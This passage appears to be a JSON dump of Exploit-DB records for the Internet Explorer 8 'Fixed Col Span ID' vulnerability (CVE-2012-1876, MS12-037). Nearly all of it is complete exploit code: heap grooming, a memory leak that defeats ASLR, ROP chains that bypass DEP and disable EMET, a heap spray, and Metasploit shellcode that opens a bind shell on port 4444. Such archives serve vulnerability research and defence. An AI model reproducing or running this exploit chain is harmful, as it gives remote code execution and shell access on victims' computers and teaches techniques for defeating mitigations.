unescape(\"%u744e%u6553\"); // NtSetContextThread\r\n shellcode+= unescape(\"%u4374%u6e6f\");\r\n shellcode+= unescape(\"%u6574%u7478\");\r\n shellcode+= unescape(\"%u6854%u6572\");\r\n shellcode+= unescape(\"%u6461%u0000\");\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n // EMET disable part 0x02 end\r\n\r\n // Bind shellcode on 4444 :)\r\n // msf > generate -t js_le\r\n // windows/shell_bind_tcp - 342 bytes\r\n // http://www.metasploit.com\r\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\r\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\r\n // I would keep the shellcode the same size for better reliability :)\r\n\r\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\r\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\r\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\r\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\r\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\r\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\r\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\r\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\r\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\r\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\r\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\r\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\r\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\r\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\r\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\r\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\r\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\r\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\r\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\r\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\r\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\r\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\r\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\r\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\r\n \"%u006a%uff53%u41d5\");\r\n\r\n // Total spray should be 1000\r\n var padding = unescape(\"%u9090\");\r\n while (padding.length < 1000)\r\n padding = padding + padding;\r\n var padding = padding.substr(0, 1000 - shellcode.length);\r\n\r\n shellcode+= padding;\r\n\r\n while (shellcode.length < 100000)\r\n shellcode = shellcode + shellcode;\r\n\r\n var onemeg = shellcode.substr(0, 64*1024/2);\r\n\r\n for (i=0; i<14; i++) {\r\n onemeg += shellcode.substr(0, 64*1024/2);\r\n }\r\n\r\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n\r\n var spray = new Array();\r\n\r\n for (i=0; i<100; i++) {\r\n spray[i] = onemeg.substr(0, onemeg.length);\r\n }\r\n}\r\n\r\nfunction leak(){\r\n var leak_col = document.getElementById(\"132\");\r\n leak_col.width = \"41\";\r\n leak_col.span = \"19\";\r\n}\r\n\r\nfunction get_leak() {\r\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\r\n str_addr = str_addr - 1410704;\r\n var hex = str_addr.toString(16);\r\n //alert(hex);\r\n setTimeout(function(){heapspray(str_addr)}, 50);\r\n}\r\n\r\nfunction trigger_overflow(){\r\n var evil_col = document.getElementById(\"132\");\r\n evil_col.width = \"1245880\";\r\n evil_col.span = \"44\";\r\n}\r\n\r\nsetTimeout(function(){leak()}, 400);\r\nsetTimeout(function(){get_leak()},450);\r\nsetTimeout(function(){trigger_overflow()}, 700);\r\n\r\n</script>\r\n</body>\r\n</html>\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/33944/"}, {"lastseen": "2016-02-03T23:59:41", "description": "Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037). CVE-2012-1876. Remote exploit for windows platform", "published": "2014-09-29T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass MS12-037", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2014-09-29T00:00:00", "id": "EDB-ID:34815", "href": "https://www.exploit-db.com/exploits/34815/", "sourceData": "<!--\r\n** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.0 bypass\r\n** Exploit Coded by sickness || EMET 5.0 bypass by ryujin\r\n** http://www.offensive-security.com/vulndev/disarming-emet-v5-0/ \u200e\r\n** Affected Software: Internet Explorer 8\r\n** Vulnerability: Fixed Col Span ID\r\n** CVE: CVE-2012-1876\r\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.0\r\n-->\r\n\r\n<html>\r\n<body>\r\n<div id=\"evil\"></div>\r\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" >\u00a0 </col></table>\r\n<script language='javascript'>\r\n\r\nfunction strtoint(str) {\r\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\r\n}\r\n\r\nvar free = \"EEEE\";\r\nwhile ( free.length < 500 ) free += free;\r\n\r\nvar string1 = \"AAAA\";\r\nwhile ( string1.length < 500 ) string1 += string1;\r\n\r\nvar string2 = \"BBBB\";\r\nwhile ( string2.length < 500 ) string2 += string2;\r\n\r\nvar fr = new Array();\r\nvar al = new Array();\r\nvar bl = new Array();\r\n\r\nvar div_container = document.getElementById(\"evil\");\r\ndiv_container.style.cssText = \"display:none\";\r\n\r\nfor (var i=0; i < 500; i+=2) {\r\n fr[i] = free.substring(0, (0x100-6)/2);\r\n al[i] = string1.substring(0, (0x100-6)/2);\r\n bl[i] = string2.substring(0, (0x100-6)/2);\r\n var obj = document.createElement(\"button\");\r\n div_container.appendChild(obj);\r\n}\r\n\r\nfor (var i=200; i<500; i+=2 ) {\r\n fr[i] = null;\r\n CollectGarbage();\r\n}\r\n\r\nfunction heapspray(cbuttonlayout) {\r\n CollectGarbage();\r\n var rop = cbuttonlayout + 4161; // RET\r\n var rop = rop.toString(16);\r\n var rop1 = rop.substring(4,8);\r\n var rop2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 11360; // POP EBP\r\n var rop = rop.toString(16);\r\n var rop3 = rop.substring(4,8);\r\n var rop4 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\r\n var rop = rop.toString(16);\r\n var rop5 = rop.substring(4,8);\r\n var rop6 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12377; // POP EBX\r\n var rop = rop.toString(16);\r\n var rop7 = rop.substring(4,8);\r\n var rop8 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 642768; // POP EDX\r\n var rop = rop.toString(16);\r\n var rop9 = rop.substring(4,8);\r\n var rop10 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\r\n var rop = rop.toString(16);\r\n var rop11 = rop.substring(4,8);\r\n var rop12 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 5504544; // Writable location\r\n var rop = rop.toString(16);\r\n var writable1 = rop.substring(4,8);\r\n var writable2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12462; // POP EDI\r\n var rop = rop.toString(16);\r\n var rop13 = rop.substring(4,8);\r\n var rop14 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\r\n var rop = rop.toString(16);\r\n var rop15 = rop.substring(4,8);\r\n var rop16 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 63776; // JMP EAX\r\n var rop = rop.toString(16);\r\n var jmpeax1 = rop.substring(4,8);\r\n var jmpeax2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 85751; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop17 = rop.substring(4,8);\r\n var rop18 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 4936; // VirtualProtect()\r\n var rop = rop.toString(16);\r\n var vp1 = rop.substring(4,8);\r\n var vp2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\r\n var rop = rop.toString(16);\r\n var rop19 = rop.substring(4,8);\r\n var rop20 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 234657; // PUSHAD\r\n var rop = rop.toString(16);\r\n var rop21 = rop.substring(4,8);\r\n var rop22 = rop.substring(0,4); // } RET\r\n\r\n\r\n var rop = cbuttonlayout + 408958; // PUSH ESP\r\n var rop = rop.toString(16);\r\n var rop23 = rop.substring(4,8);\r\n var rop24 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 2228408; // POP ECX\r\n var rop = rop.toString(16);\r\n var rop25 = rop.substring(4,8);\r\n var rop26 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 1586172; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop27 = rop.substring(4,8);\r\n var rop28 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\r\n var rop = rop.toString(16);\r\n var rop29 = rop.substring(4,8);\r\n var rop30 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 1884912; // PUSH EAX\r\n var rop = rop.toString(16);\r\n var rop31 = rop.substring(4,8);\r\n var rop32 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\r\n var rop = rop.toString(16);\r\n var rop33 = rop.substring(4,8);\r\n var rop34 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\r\n var rop = rop.toString(16);\r\n var rop35 = rop.substring(4,8);\r\n var rop36 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 5036248; // ADD ESP,0C\r\n var rop = rop.toString(16);\r\n var rop37 = rop.substring(4,8);\r\n var rop38 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX\r\n var rop = rop.toString(16);\r\n var rop39 = rop.substring(4,8);\r\n var rop40 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 3660458; // MOV EDX,EAX # MOV EAX,EDX # POP ESI\r\n var rop = rop.toString(16);\r\n var rop41 = rop.substring(4,8);\r\n var rop42 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 1560432; // PUSH EDX # CALL EAX\r\n var rop = rop.toString(16);\r\n var rop43 = rop.substring(4,8);\r\n var rop44 = rop.substring(0,4); // } RET\r\n\r\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\r\n var getmodulew = getmodulew.toString(16);\r\n var getmodulew1 = getmodulew.substring(4,8);\r\n var getmodulew2 = getmodulew.substring(0,4); // } RET\r\n\r\n\r\n var shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\r\n shellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\r\n shellcode+= unescape(\"%u4141%u4141\"); // PADDING\r\n\r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\r\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\r\n\r\n // EMET disable part 0x01\r\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\r\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\r\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW Ptr\r\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u10c4%u076d\"); // EMET_STRING_PTR (GetModuleHandle argument)\r\n shellcode+= unescape(\"%ua84c%u000a\"); // EMET_CONFIG_STRUCT offset \r\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\r\n shellcode+= unescape(\"%u10c0%u076d\"); // MEM_ADDRESS_PTR (Store EMET base address here for later)\r\n shellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX\r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of EMET_CONFIG_STRUCT)\r\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\r\n shellcode+= unescape(\"%u104c%u076d\"); // Get fake DecodePointer argument from the stack and update it with the encoded value\r\n shellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX\r\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\r\n shellcode+= unescape(\"%u10c0%u076d\"); // Get EMET base address Ptr\r\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u80b0%u0004\"); // Get DecodePointer offset from the stack \r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (DecodePointer in IAT)\r\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\r\n shellcode+= unescape(\"%u9090%u9090\"); // Fake DecodePointer argument (Will be patched)\r\n shellcode+= unescape(\"%u10bc%u076d\"); // MEM_ADDRESS_PTR (Store decoded pointer here here for later)\r\n shellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u0558%u0000\"); // ROP Protections offset\r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u0000%u0000\"); // NULL\r\n shellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\r\n // EMET disable part 0x01 end\r\n\r\n // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP\r\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\r\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\r\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\r\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\r\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\r\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\r\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\r\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2);// JMP EAX\r\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\r\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\r\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\r\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\r\n\r\n // Store various pointers here\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u14eb\"); // NOPs\r\n shellcode+= unescape(\"%u4242%u4242\"); // Decoded CONFIG structure pointer\r\n shellcode+= unescape(\"%u4141%u4141\"); // Store BaseAddress address on the *stack*\r\n shellcode+= \"EMET\"; // EMET string\r\n shellcode+= unescape(\"%u0000%u0000\"); // EMET string\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n // Store various pointers here\r\n\r\n // EMET disable part 0x02\r\n // MOV EAX,DWORD PTR DS:[076D10BCH]\r\n // MOV ESI,DWORD PTR [EAX+518H]\r\n // SUB ESP,2CCH\r\n // MOV DWORD PTR [ESP],10010H\r\n // MOV EDI,ESP\r\n // MOV ECX,2CCH\r\n // ADD EDI,4\r\n // SUB ECX,4\r\n // XOR EAX,EAX\r\n // REP STOS BYTE PTR ES:[EDI]\r\n // PUSH ESP\r\n // PUSH 0FFFFFFFEH\r\n // CALL ESI\r\n shellcode+= unescape(\"%ubca1%u6d10%u8b07%u18b0%u0005%u8100%uccec\" +\r\n \"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9\" +\r\n \"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa\" +\r\n \"%ufe6a%ud6ff\");\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n // EMET disable part 0x02 end\r\n\r\n // Bind shellcode on 4444 :)\r\n // msf > generate -t js_le\r\n // windows/shell_bind_tcp - 342 bytes\r\n // http://www.metasploit.com\r\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\r\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\r\n // I would keep the shellcode the same size for better reliability :)\r\n\r\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\r\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\r\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\r\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\r\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\r\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\r\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\r\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\r\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\r\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\r\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\r\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\r\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\r\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\r\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\r\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\r\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\r\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\r\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\r\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\r\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\r\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\r\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\r\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\r\n \"%u006a%uff53%u41d5\");\r\n\r\n // Total spray should be 1000\r\n var padding = unescape(\"%u9090\");\r\n while (padding.length < 1000)\r\n padding = padding + padding;\r\n var padding = padding.substr(0, 1000 - shellcode.length);\r\n\r\n shellcode+= padding;\r\n\r\n while (shellcode.length < 100000)\r\n shellcode = shellcode + shellcode;\r\n\r\n var onemeg = shellcode.substr(0, 64*1024/2);\r\n\r\n for (i=0; i<14; i++) {\r\n onemeg += shellcode.substr(0, 64*1024/2);\r\n }\r\n\r\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n\r\n var spray = new Array();\r\n\r\n for (i=0; i<100; i++) {\r\n spray[i] = onemeg.substr(0, onemeg.length);\r\n }\r\n}\r\n\r\nfunction leak(){\r\n var leak_col = document.getElementById(\"132\");\r\n leak_col.width = \"41\";\r\n leak_col.span = \"19\";\r\n}\r\n\r\nfunction get_leak() {\r\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\r\n str_addr = str_addr - 1410704;\r\n var hex = str_addr.toString(16);\r\n //alert(hex);\r\n setTimeout(function(){heapspray(str_addr)}, 50);\r\n}\r\n\r\nfunction trigger_overflow(){\r\n var evil_col = document.getElementById(\"132\");\r\n evil_col.width = \"1245880\";\r\n evil_col.span = \"44\";\r\n}\r\n\r\nsetTimeout(function(){leak()}, 400);\r\nsetTimeout(function(){get_leak()},450);\r\nsetTimeout(function(){trigger_overflow()}, 700);\r\n\r\n</script>\r\n</body>\r\n</html>", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34815/"}, {"lastseen": "2016-02-04T00:57:45", "description": "Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.1 Bypass (MS12-037). CVE-2012-1876. Remote exploit for windows platform", "published": "2014-11-17T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.1 Bypass MS12-037", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2014-11-17T00:00:00", "id": "EDB-ID:35273", "href": "https://www.exploit-db.com/exploits/35273/", "sourceData": "<!--\r\n** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.1 bypass\r\n** Exploit Coded by sickness || EMET 5.1 bypass by ryujin\r\n** http://www.offensive-security.com/vulndev/disarming-and-bypassing-emet-5-1/\r\n** Affected Software: Internet Explorer 8\r\n** Vulnerability: Fixed Col Span ID\r\n** CVE: CVE-2012-1876\r\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.1\r\n-->\r\n\r\n<html>\r\n<body>\r\n<div id=\"evil\"></div>\r\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" >\u00c2\u00a0 </col></table>\r\n<script language='javascript'>\r\n\r\nfunction strtoint(str) {\r\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\r\n}\r\n\r\nvar free = \"EEEE\";\r\nwhile ( free.length < 500 ) free += free;\r\n\r\nvar string1 = \"AAAA\";\r\nwhile ( string1.length < 500 ) string1 += string1;\r\n\r\nvar string2 = \"BBBB\";\r\nwhile ( string2.length < 500 ) string2 += string2;\r\n\r\nvar fr = new Array();\r\nvar al = new Array();\r\nvar bl = new Array();\r\n\r\nvar div_container = document.getElementById(\"evil\");\r\ndiv_container.style.cssText = \"display:none\";\r\n\r\nfor (var i=0; i < 500; i+=2) {\r\n fr[i] = free.substring(0, (0x100-6)/2);\r\n al[i] = string1.substring(0, (0x100-6)/2);\r\n bl[i] = string2.substring(0, (0x100-6)/2);\r\n var obj = document.createElement(\"button\");\r\n div_container.appendChild(obj);\r\n}\r\n\r\nfor (var i=200; i<500; i+=2 ) {\r\n fr[i] = null;\r\n CollectGarbage();\r\n}\r\n\r\nfunction heapspray(cbuttonlayout) {\r\n CollectGarbage();\r\n var rop = cbuttonlayout + 4161; // RET\r\n var rop = rop.toString(16);\r\n var rop1 = rop.substring(4,8);\r\n var rop2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 11360; // POP EBP\r\n var rop = rop.toString(16);\r\n var rop3 = rop.substring(4,8);\r\n var rop4 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\r\n var rop = rop.toString(16);\r\n var rop5 = rop.substring(4,8);\r\n var rop6 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12377; // POP EBX\r\n var rop = rop.toString(16);\r\n var rop7 = rop.substring(4,8);\r\n var rop8 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 642768; // POP EDX\r\n var rop = rop.toString(16);\r\n var rop9 = rop.substring(4,8);\r\n var rop10 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\r\n var rop = rop.toString(16);\r\n var rop11 = rop.substring(4,8);\r\n var rop12 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 5504544; // Writable location\r\n var rop = rop.toString(16);\r\n var writable1 = rop.substring(4,8);\r\n var writable2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12462; // POP EDI\r\n var rop = rop.toString(16);\r\n var rop13 = rop.substring(4,8);\r\n var rop14 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\r\n var rop = rop.toString(16);\r\n var rop15 = rop.substring(4,8);\r\n var rop16 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 63776; // JMP EAX\r\n var rop = rop.toString(16);\r\n var jmpeax1 = rop.substring(4,8);\r\n var jmpeax2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 85751; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop17 = rop.substring(4,8);\r\n var rop18 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 4936; // VirtualProtect()\r\n var rop = rop.toString(16);\r\n var vp1 = rop.substring(4,8);\r\n var vp2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\r\n var rop = rop.toString(16);\r\n var rop19 = rop.substring(4,8);\r\n var rop20 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 234657; // PUSHAD\r\n var rop = rop.toString(16);\r\n var rop21 = rop.substring(4,8);\r\n var rop22 = rop.substring(0,4); // } RET\r\n\r\n\r\n var rop = cbuttonlayout + 408958; // PUSH ESP\r\n var rop = rop.toString(16);\r\n var rop23 = rop.substring(4,8);\r\n var rop24 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 2228408; // POP ECX\r\n var rop = rop.toString(16);\r\n var rop25 = rop.substring(4,8);\r\n var rop26 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 1586172; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop27 = rop.substring(4,8);\r\n var rop28 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\r\n var rop = rop.toString(16);\r\n var rop29 = rop.substring(4,8);\r\n var rop30 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 1884912; // PUSH EAX\r\n var rop = rop.toString(16);\r\n var rop31 = rop.substring(4,8);\r\n var rop32 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\r\n var rop = rop.toString(16);\r\n var rop33 = rop.substring(4,8);\r\n var rop34 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\r\n var rop = rop.toString(16);\r\n var rop35 = rop.substring(4,8);\r\n var rop36 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX\r\n var rop = rop.toString(16);\r\n var rop37 = rop.substring(4,8);\r\n var rop38 = rop.substring(0,4); // } RET\r\n\r\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\r\n var getmodulew = getmodulew.toString(16);\r\n var getmodulew1 = getmodulew.substring(4,8);\r\n var getmodulew2 = getmodulew.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 3621437; // MOV EAX,EDX\r\n var rop = rop.toString(16);\r\n var rop41 = 